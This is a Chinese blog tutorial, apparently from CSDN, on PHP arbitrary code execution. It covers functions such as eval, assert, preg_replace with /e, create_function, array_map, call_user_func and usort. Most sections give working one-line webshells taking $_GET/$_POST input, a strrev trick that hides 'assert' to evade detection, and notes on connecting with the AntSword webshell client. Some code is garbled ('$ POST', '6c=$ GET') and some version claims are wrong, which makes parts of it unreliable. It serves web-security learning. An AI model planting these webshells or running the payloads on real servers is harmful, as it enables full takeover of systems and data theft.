基础漏洞——任意代码执行漏洞

于 2024-09-17 14:00:00 发布
阅读量962 收藏 28
点赞数 27
文章标签: android 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79096184/article/details/142308215
版权

这个必须的白盒测试情况下,才搞的出来,当然有大老能猜到,不过几乎为0。

目录

一.原理

二.相关的函数

(1)assert ()在mysql7.0版本被禁了。

(2)preg_replace ()+ /e 模式    php5.7版本以上被禁用。

(3)create_function ()

(4)array_map ()

(5)call_user_func ()

(6)call_user_func_array ()

(7)array_filter ()

(8)usort (), uasort ()

(9)$_GET[' a' ] ($_GET[' b ']); //a=assert&b=phpinfo ()

三.任意代码执行漏洞危害 

四.任意代码执行漏洞防护

一.原理

由于web应用对于用户输入的数据进行过滤或者过滤不严格,导致攻击者可以直接接触的危险函数,像eval()、assert()函数,eval等函数可以将字符串当作代码来执行,从而让服务器沦陷。

例子:

这里有一个一句话木马

http://192.168.2.18/1.php?1=phpinfo()

http://192.168.2.18/1.php?1=phpinfo();

二.相关的函数

eval ()

assert ()

preg_replace ()+ /e 模式

create_function ()

array_map ()

call_user_func () / call_user_func_array ()

array_filter ()

usort (), uasort ()

$_GET[' a' ] ($_GET[' b ']); //a=assert&b=phpinfo ()

(1)assert ()在mysql7.0版本被禁了。

(1.1)普通的形式

http://192.168.2.18/1.php?1=system(ipconfig)

如何用蚁剑连接这个函数

由于蚁剑只能通过POST所以再在里面写一个一句话木马。

http://192.168.2.18/1.php?1=eval($_POST[123])

(1.2)通过.连接

http://192.168.2.18/1.php?1=phpinfo()

这样的话,拿eval也可以了?答案是不行,这也是为什么assert函数在7.0版本被禁止的原因,太变态了。

(1.3)通过substr

(1.4)反转函数strrev

http://192.168.2.18/1.php?1=phpinfo()

(1.5)用函数包裹

http://192.168.2.18/1.php?1=phpinfo()

function yy1($a,$b,$c)

{

yy2($a,$b);

}

function yy2($a,$y){

$a=strrev($a);

$a($_GET[1]);

}

yy1($a='tressa',$b='y',$c='w');

(2)preg_replace ()+ /e 模式    php5.7版本以上被禁用。

代码:

<?php

$str = 'sCdScds';

//如果使用/e修饰符,做替换的时候就会当做PHP代码执行

$preg = '/\w+/ie';

//定义替换字符串为php可执行代码例:phpinfo()

$aa = "phpinfo()";

//进行替换

echo preg_replace($preg, $aa, $str);

?>

替换过程中会将$aa当作代码执行。

http://192.168.2.18/1.php

用蚁剑连接

$str = 'sCdScds';

//如果使用/e修饰符,做替换的时候就会当做PHP代码执行

$preg = '/\w+/ie';

//定义替换字符串为php可执行代码例:phpinfo()

$aa = "$_POST[1]";

//进行替换

echo preg_replace($preg, $aa, $str);

有时需要不同编码。

(3)create_function ()

<?php

//函数内部执行代码

//查看php版本

$func = create_function('',phpinfo());

$func();

?>

''函数名,这个意思就是创建一个func名的函数,执行phpinfo()

连接

//函数内部执行代码

//查看php版本

$func = create_function('',$_POST[1]);

$func();

?>

 

 

(4)array_map ()

<?php

//传递函数名

$f = $_GET['f'];               //assert

//传递php执行代码

$c = $_POST['c'];                       //phpinfo()

$a[0] = $c;

// array_map(functionName,arr1,arr2...)

//函数名(必填) 需要修改的数组(必须填)1个或多个

$arr = array_map($f,$a);

//var_dump ($arr);

?>

array_map('assert',$_POST); 

随便什么密码都可以直接连接。

调用assert执行POST1.

array_map('assert',[$_POST[1]]); 

(5)call_user_func ()

$f=$_GET[1];

$p=$_post[2];

call_user_func ($f,$p) ;

(6)call_user_func_array ()

<?php

//                                              函数 数组参数

// call_user_func_array(function, param_arr)

$a = $_GET['a']; //函数名

$b = $_POST['b']; //函数参数

$c[0] = $b; //数组方式存放参数

call_user_func_array($a, $c);

?>

$f=$_GET[1];

$p=$_POST[2];

call_user_func_array($f,[$p]) ;

(7)array_filter ()

<?php

// 数组 回调函数

//array_filter($arr,function);

$aa = $_GET['aa'];//输入函数名

$bb = $_POST['bb']; //函数参数

array_filter($bb,$aa); //assert $_POST['bb']

?>

参数与call_user_func_array ()相反。

(8)usort (), uasort ()

<?php

//元素排序 数组 自定义排序函数

// usort(array, myfunction)

//版本需要5.4+ (注意数组至少要有2个元素)

要执行的代码不要放在第一个

usort($_GET, 'assert');

?>

<?php

//元素排序 数组 自定义排序函数

// usort(array, myfunction)

//版本需要5.4+

//元素排序 数组 自定义排序函数

//usort(array, myfunction)

$a = $ POST['a'];

//这里注意第一个变量数组需要在

首位增加一个任意元素

$b[0]= 1;

$b[1] = $a;

var dump($b);

6c=$ GET['C'];

usort($b, "$c”);

?>

(9)$_GET[' a' ] ($_GET[' b ']); //a=assert&b=phpinfo ()

<?php

$_GET['b'])($_GET['b']);

//一句话写法

$_GET['a']($_POST['a']);

?>

参数:url?a=assert&b=phpinfo ()

三.任意代码执行漏洞危害 

1.反弹shell,攻击者可以直接接管服务器

2.执行恶意代码

3.访问敏感数据

4.对我们服务器造成破环

四.任意代码执行漏洞防护

1.使用可靠的库和函数

2.定期扫描审计

3.严格的访问控制

4.对有些特定命令做限制。

没有名字的小羊
关注
web渗透之——任意代码执行漏洞
wsnbbz的博客
03-04 1496
漏洞原理 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞 在php中: eval,assert,将字符串当成代码执行 preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值 漏洞形成 如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就...
java 任意代码执行漏洞_SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析
weixin_39732506的博客
03-02 2416
CVE-2010-1622很老的的一个洞了,最近在分析Spring之前的漏洞时看到的。利用思路很有意思,因为这个功能其实之前开发的时候也经常用,当然也有很多局限性。有点类似js原型链攻击的感觉,这里分享出来。介绍CVE-2010-1622因为Spring框架中使用了不安全的表单绑定对象功能。这个机制允许攻击者修改加载对象的类加载器的属性,可能导致拒绝服务和任意命令执行漏洞。Versions Aff...
漏洞复现篇——任意代码命令执行漏洞复现及防御
爱国小白帽
02-27 4005
什么是代码执行: 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞代码执行函数: 在php中:eval,assert,preg_replace(‘/*/e’, 'ret="1";′,ret = "\\1";',ret="1";′,data); 在asp中:eval, exevute,executeglobal 在jsp中:jsp中没有p...
代码执行漏洞详解
m0_55854679的博客
03-13 4467
文章目录小知识漏洞原理相关函数eval()函数assert()函数preg_replace()函数create_function()函数array_map()函数特殊组合(双引号二次解析) 小知识 代码审计: 通读全文【新手建议读blueCMS】。 危险函数定位【代码审计工具】。 利用曾经出现过的漏洞漏洞原理 用户输入的数据被当做后端代码进行执行。 <?php @eval($_REQUEST[8])?> ,其实一句话木马的本质就是一个代码执行漏洞。 这里提一个概念叫RCE远程命令或者代
5.基础漏洞——文件上传漏洞
最新发布
2301_79096184的博客
09-15 688
1.前端绕过2.MIME类型绕过3.后缀大小写绕过4.00截断攻击5.双写文件后缀绕过。
命令执行漏洞——系统命令执行
weixin_54055099的博客
09-17 944
命令执行漏洞之系统执行命令基础操作
CTF——远程代码执行漏洞的利用与绕过
weixin_51735061的博客
03-10 4589
CTF——远程代码执行漏洞的利用与绕过 RCE远程代码执行是一种常见的攻击方法,通过一些特定的函数方法来达到远程执行漏洞。比如说PHP的system,exec,shell_exec,nodejs的eval等。开发者不小心将这些函数公开出来以实现某种服务,而用户的数据不施加任何的过滤的话就很容易形成此漏洞。 敏感函数 系统指令执行的敏感函数 system()、exec()、shell_exec()、passthru()、pctnl_exec()、 popen()、proc_open() 能够进行代码注入的敏
DVWA——命令执行漏洞学习
Lemon's blog
08-12 4016
前言:命令执行代码执行也是web安全中常见的一种漏洞,这次就来学习一下。
漏洞复现】蓝凌OA——远程命令执行
LongL_GuYu的博客
07-28 710
蓝凌OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织的内外协作与管理,支撑商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷问题,攻击者可以利用文件复制的方式,将后台脚本功能模块文件复制到无需权限认证的目录下,导致未经过身份认证的攻击者利用后台脚本执行模块,远程命令执行,写入后门文件并获取服务器权限。
远程代码执行漏洞—— CVE-2020-11975 Apache Unomi
aming小老弟
02-19 1018
QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。 叮叮叮:产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司 民生项目:商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/ 安全项目:态势感..
Bash漏洞——Shellshock浅析.pdf
07-10
【Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
### ThinkPHP 5.0 远程代码执行漏洞分析 #### 漏洞背景与概述 ThinkPHP是一款广泛使用的PHP框架,它提供了丰富的功能和良好的性能。然而,如同任何复杂的软件系统一样,它也存在安全漏洞。本次分析的焦点集中在...
小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本
04-20
### 小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本 #### 一、漏洞背景及使用须知 此文档公开了一款广泛使用的Web服务器环境集成管理软件——小皮(Phpstudy)面板存在的安全问题。该软件因其简单易用的特点...
PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生1
08-03
然而,在其多个版本中存在一个严重的安全漏洞——任意代码执行漏洞。该漏洞允许攻击者在服务器上执行任意 PHP 代码,从而导致服务器被完全控制。 #### 漏洞详情 漏洞主要出现在 `ParserController.php` 文件中的 `...
【兼容性记录】video标签在 IOS 和 安卓中的问题
fans_x的博客
09-13 883
业务需求背景:由于业务中涉及到有视频播放的内容,所以就使用了video标签去做,但是video标签在ios 设备和安卓设备中的默认行为不一致,故记录下解决方法(折中办法)。
Android 内置应用裁剪
Framework-coder的博客
09-13 143
参考 AOSP 中 PRODUCT_PACKAGES 配置的方式,自定义一个“PRODUCT_PACKAGES_REMOVE”配 置选项。用户可根据自身项目的需要,将需裁剪的 APK 名称(无需 .apk 后缀) 都添加到“PRODUCT_PACKAGES_REMOVE”项下,从而做到一次性全部裁剪。此方法省去了查找目标 APK 的编译.mk 文件的时间,提高了工作效率。补丁如下:从以上补丁可以发现,只要是添加在“PRODUCT_PACKAGES_REMOVE”配置项下的 APK 都将被裁剪。
android 14.0 USB连接模式默认设为MTP
安卓兼职framework和app工程师的博客
09-13 346
在14.0android系统产品开发中,在通过otg连接设备的时候,会弹出usb连接模式这时候会让客户选择当前连接电脑是 哪种模式,在项目开发中,需要以mtp模式,就是可以在电脑查看设备的内部存储的样式来设置otg连接电脑的模式, 接下来分析下相关模式,来具体实现相关功能
Android14 蓝牙 BluetoothService 启动和相关代码介绍
wenzhi的博客
09-14 1706
蓝牙开关和使能开发主要用到:BluetoothService、BluetoothManagerService、BluetoothManager、BluetoothAdapter 这几个系统相关类。某个蓝牙的配对、连接、断开 使用的是 BluetoothDevice 对象。蓝牙开关状态不记忆或者打开异常就可以看看BluetoothManagerService的日志,里面有打开关闭相关过程日志和时间点,这个对问题分析有一定的帮助。本文主要介绍一下 framework 相关的几个类,
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 742
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值